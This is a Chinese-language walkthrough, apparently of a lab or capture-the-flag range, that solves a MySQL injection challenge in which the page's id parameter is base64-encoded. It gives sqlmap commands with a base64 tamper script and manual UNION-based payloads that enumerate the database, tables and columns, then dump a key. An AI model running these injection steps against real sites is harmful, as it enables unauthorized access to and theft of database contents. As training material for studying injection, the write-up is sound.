sql注入实战mysql(进阶版)
看这个是base64编码
手工注入注入不出来。。。
使用sqlmap跑提示使用tamper插件(里面有一个base64encode.py)
python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py --risk 3 --dbms=mysql
暴库
python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py --risk 3 --dbms=mysql --dbs
出来两个库(information_schema 和 test)
暴表
python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py --risk 3 --dbms=mysql --tables -D test
爆出data
暴列
python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py --risk 3 --dbms=mysql --colunmns -T data -D test
爆出 id main thekey
暴字段
python2 sqlmap.py -u "http://219.153.49.228:45110/show.php?id=MQo=" --tamper=base64encode.py --risk 3 --dbms=mysql --dump -C "id,main,thekey" -T data -D test
得出key
手工注入
MQo= 是1的base64编码
以下执行的时候都要base64编码,用火狐的hackbar
猜长度
http://219.153.49.228:46170/show.php?id=1 order 2
回显正常 说明长度为2
猜库名
http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,database()
猜出库名为test
猜表名
http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='test'
猜出表名为 data
猜列
http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()
猜出有 id,title,main,thekey
猜字段
http://219.153.49.228:46170/show.php?id=1 and 1=2 union select 1,group_concat(id,'-',thekey) from data
得出key 1-mozhe1f0328cc6f2a60605567e65e5cd
网友评论